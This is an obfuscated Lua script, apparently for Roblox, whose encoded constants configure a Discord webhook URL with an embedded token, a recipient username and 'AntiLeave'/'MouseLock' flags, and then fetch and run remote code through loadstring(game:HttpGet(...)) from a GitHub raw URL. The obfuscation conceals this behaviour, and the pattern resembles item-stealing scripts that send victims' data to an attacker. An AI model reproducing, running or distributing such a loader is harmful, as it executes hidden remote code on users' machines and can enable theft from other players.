--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -(1 + 0)))) + (620 -(555 + 64)))) ;return v71-(v71%((147 + 785) -(857 + 74))) ;else local v72=(570 -(367 + 201))^(v32-1) ;return (((v31%(v72 + v72))>=v72) and (928 -(214 + 713))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (880 -(282 + 595)) );v19=v19 + (1641 -(1523 + 114)) ;return (v37 * (15077001 + 1700215)) + (v36 * (93426 -27890)) + (v35 * (1321 -((1338 -(226 + 1044)) + 997))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=1180 -(1123 + 57) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==(0 + 0)) then v39=0;v40=nil;v38=1;end if (v38==4) then while true do if ((255 -(163 + 91))~=v39) then else local v94=1930 -(1869 + 61) ;while true do if (v94~=0) then else v42=nil;v43=nil;v94=1;end if (v94~=(1 + 0)) then else v39=6 -4 ;break;end end end if (v39~=(0 -0)) then else v40=0 + 0 ;v41=nil;v39=1 -0 ;end if (3==v39) then v46=nil;while true do local v96=0;local v97;while true do if (0~=v96) then else v97=0;while true do if (v97==(0 + 0)) then local v104=1474 -(1329 + 145) ;while true do if (1==v104) then v97=972 -(140 + 831) ;break;end if (v104==0) then if (v40==(1852 -(1409 + 441))) then local v166=718 -(15 + 703) ;local v167;while true do if (v166==(0 + 0)) then v167=438 -(262 + 176) ;while true do if (v167==1) then for v181=1,v24() do local v182=1721 -(345 + 1376) ;local v183;local v184;local v185;while true do if (v182==(688 -(198 + 490))) then v183=0;v184=nil;v182=4 -3 ;end if (v182~=1) then else v185=nil;while true do if (v183==(2 -1)) then while true do if (v184==(1206 -(696 + 510))) then v185=v22();if (v21(v185,1 -0 ,1)==(1262 -(1091 + 171))) then local v194=0 + 0 ;local v195;local v196;local v197;local v198;while true do if (v194~=(3 -2)) then else v197=nil;v198=nil;v194=2;end if (0==v194) then v195=0;v196=nil;v194=3 -2 ;end if (2==v194) then while true do if (3==v195) then if (v21(v197,377 -(123 + 251) ,3)==(4 -3)) then v198[4]=v46[v198[4]];end v41[v181]=v198;break;end if (v195~=(698 -(208 + 490))) then else local v202=0 + 0 ;while true do if (v202==(0 + 0)) then v196=v21(v185,2,839 -(660 + 176) );v197=v21(v185,1 + 3 ,6);v202=1;end if (v202==(203 -(14 + 188))) then v195=1;break;end end end if (1==v195) then local v203=675 -(534 + 141) ;while true do if ((1 + 0)==v203) then v195=2 + 0 ;break;end if (v203==0) then v198={v23(),v23(),nil,nil};if (v196==0) then local v208=0;local v209;while true do if (v208==0) then v209=0;while true do if (v209~=0) then else v198[6 -3 ]=v23();v198[5 -1 ]=v23();break;end end break;end end elseif (v196==(2 -1)) then v198[3]=v24();elseif (v196==(2 + 0)) then v198[2 + 1 ]=v24() -(2^16) ;elseif (v196==3) then local v218=0;local v219;while true do if ((396 -(115 + 281))~=v218) then else v219=0;while true do if (v219==0) then v198[6 -3 ]=v24() -(2^16) ;v198[4]=v23();break;end end break;end end end v203=1;end end end if (v195==(2 + 0)) then local v204=0 -0 ;local v205;while true do if (0~=v204) then else v205=0;while true do if (v205~=1) then else v195=3;break;end if (v205~=0) then else if (v21(v197,3 -2 ,868 -(550 + 317) )~=1) then else v198[2]=v46[v198[2]];end if (v21(v197,2,2)~=1) then else v198[3 -0 ]=v46[v198[3]];end v205=1 -0 ;end end break;end end end end break;end end end break;end end break;end if (v183==0) then v184=0;v185=nil;v183=2 -1 ;end end break;end end end v40=3;break;end if (v167==(285 -(134 + 151))) then local v178=1665 -(970 + 695) ;local v179;while true do if (v178==(0 -0)) then v179=0;while true do if (v179==1) then v167=1;break;end if (v179==0) then for v189=1,v45 do local v190=0;local v191;local v192;local v193;while true do if (v190==(1991 -(582 + 1408))) then v193=nil;while true do if (v191~=0) then else local v199=0 -0 ;while true do if (v199~=0) then else v192=v22();v193=nil;v199=1;end if (v199~=1) then else v191=1;break;end end end if (v191==1) then if (v192==(1 -0)) then v193=v22()~=0 ;elseif (v192==2) then v193=v25();elseif (v192~=3) then else v193=v26();end v46[v189]=v193;break;end end break;end if (v190==(0 -0)) then v191=1824 -(1195 + 629) ;v192=nil;v190=1 -0 ;end end end v44[3]=v22();v179=242 -(187 + 54) ;end end break;end end end end break;end end end if (v40~=(780 -(162 + 618))) then else local v168=0 + 0 ;while true do if ((0 + 0)==v168) then local v175=0 -0 ;while true do if (v175~=(1 -0)) then else v168=1 + 0 ;break;end if (v175==(1636 -(1373 + 263))) then v41={};v42={};v175=1001 -(451 + 549) ;end end end if ((1 + 0)~=v168) then else v43={};v40=1 -0 ;break;end end end v104=1 -0 ;end end end if (v97~=1) then else if (3==v40) then local v120=1384 -(746 + 638) ;local v121;while true do if (v120~=0) then else v121=0;while true do if ((0 + 0)==v121) then local v176=0 -0 ;while true do if (v176~=(341 -(218 + 123))) then else for v186=1,v24() do v42[v186-(1582 -(1535 + 46)) ]=v29();end return v44;end end end end break;end end end if (v40==(1 + 0)) then local v122=0;local v123;while true do if (v122~=(0 + 0)) then else v123=0;while true do if (0==v123) then local v177=560 -(306 + 254) ;while true do if (v177==0) then local v180=0 + 0 ;while true do if (v180==0) then v44={v41,v42,nil,v43};v45=v24();v180=2 -1 ;end if (v180~=(604 -(268 + 335))) then else v177=1;break;end end end if (v177~=(291 -(60 + 230))) then else v123=573 -(426 + 146) ;break;end end end if ((1 + 0)==v123) then v46={};v40=1458 -(282 + 1174) ;break;end end break;end end end break;end end break;end end end break;end if (v39==2) then local v95=0;while true do if (v95==(812 -(569 + 242))) then v39=8 -5 ;break;end if (v95==(0 + 0)) then v44=nil;v45=nil;v95=1;end end end end break;end if (v38~=(1026 -(706 + 318))) then else v43=nil;v44=nil;v38=3;end if (v38~=3) then else v45=nil;v46=nil;v38=1255 -(721 + 530) ;end if ((1272 -(945 + 326))==v38) then v41=nil;v42=nil;v38=4 -2 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(1 + 0)) then v50=701 -(271 + 429) ;v51=(v21(v49,1 + (0 -0) ,1165 -(466 + (1891 -(323 + 889))) ) * (((1 + 3) -2)^(30 + 2))) + v48 ;v47=(5119 -3217) -(106 + 1794) ;end if (v47==(1503 -(1408 + 92))) then if (v52==((1666 -(361 + 219)) -(461 + 625))) then if (v51==0) then return v53 * (1288 -(993 + 295)) ;else v52=1 + 0 ;v50=0 + 0 ;end elseif (v52==((6519 -3301) -(418 + (1073 -(53 + 267))))) then return ((v51==(0 -0)) and (v53 * ((1 + 0 + 0)/(0 + (65 -(30 + 35)))))) or (v53 * NaN) ;end return v8(v53,v52-(207 + 93 + 723) ) * (v50 + (v51/((1 + 1)^(581 -(406 + 123))))) ;end if (0==v47) then v48=v24();v49=v24();v47=1;end if (v47==((2184 -(15 + 398)) -((3006 -(1043 + 214)) + 20))) then v52=v21(v49,46 -25 ,31);v53=((v21(v49,92 -60 )==(167 -(122 + (1026 -(18 + 964))))) and  -(1 -0)) or (3 -2) ;v47=1 + 2 ;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1 + 0) );v19=v19 + v54 ;local v56={};for v69=1 + 0 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=850 -(20 + 830) ;local v59;local v60;while true do if (v58==0) then v59,v60=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (128 -(116 + 10)) ;v58=1 + (0 -0) ;end if (v58==(1 + 0)) then return (v60 * (994 -(542 + 196))) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v73=v2(v0(v61,16));if v20 then local v77=v5(v73,v20);v20=nil;return v77;else return v73;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v78=v66;local v79=v67;local v80=v68;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end if (v93==1) then if (v91<=5) then if (v91<=2) then if (v91<=0) then local v105=0;local v106;local v107;local v108;local v109;while true do if (v105==0) then v106=v90[2];v107,v108=v81(v88[v106](v13(v88,v106 + 1 ,v90[3])));v105=1;end if (v105==2) then for v169=v106,v83 do v109=v109 + 1 ;v88[v169]=v107[v109];end break;end if (v105==1) then v83=(v108 + v106) -1 ;v109=0;v105=2;end end elseif (v91>1) then do return;end else v88[v90[2]]();end elseif (v91<=3) then local v110=v90[2];v88[v110]=v88[v110](v13(v88,v110 + 1 ,v83));elseif (v91==4) then v88[v90[2]]=v64[v90[3]];else v88[v90[2]][v90[3]]=v90[4];end elseif (v91<=8) then if (v91<=6) then local v112=0;local v113;local v114;local v115;local v116;local v117;while true do if (v112==4) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v112=5;end if (v112==2) then v88[v90[2]]=v64[v90[3]];v82=v82 + 1 ;v90=v78[v82];v117=v90[2];v116=v88[v90[3]];v112=3;end if (v112==0) then v113=nil;v114,v115=nil;v116=nil;v117=nil;v88[v90[2]][v90[3]]=v90[4];v112=1;end if (v112==5) then v117=v90[2];v114,v115=v81(v88[v117](v13(v88,v117 + 1 ,v90[3])));v83=(v115 + v117) -1 ;v113=0;for v172=v117,v83 do v113=v113 + 1 ;v88[v172]=v114[v113];end v112=6;end if (v112==3) then v88[v117 + 1 ]=v116;v88[v117]=v116[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v112=4;end if (v112==7) then v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];do return;end break;end if (v112==6) then v82=v82 + 1 ;v90=v78[v82];v117=v90[2];v88[v117]=v88[v117](v13(v88,v117 + 1 ,v83));v82=v82 + 1 ;v112=7;end if (v112==1) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v64[v90[3]];v82=v82 + 1 ;v90=v78[v82];v112=2;end end elseif (v91>7) then v88[v90[2]]=v90[3]~=0 ;else local v129=v90[2];local v130=v88[v90[3]];v88[v129 + 1 ]=v130;v88[v129]=v130[v90[4]];end elseif (v91<=9) then v88[v90[2]]=v90[3];elseif (v91==10) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v64[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v64[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v64[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v64[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v64[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];else v64[v90[3]]=v88[v90[2]];end v82=v82 + 1 ;break;end end end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0F3O0003083O00557365724E616D65030B3O0062782O62637868642O686703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132383036303639313733312O39323639372F6F38665561715A6F783730434164755A68444C32436B566472453065385A646833576A644D512O554568655938654F637A6B466C38433462794B6B4A4253714E7873466303093O00557365724E616D6532030C3O0048612O6C6F4869657233323403023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00120A3O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A00090012043O00073O0030063O000B000900124O000C3O00122O0001000D3O00202O00010001000E00122O0003000F6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
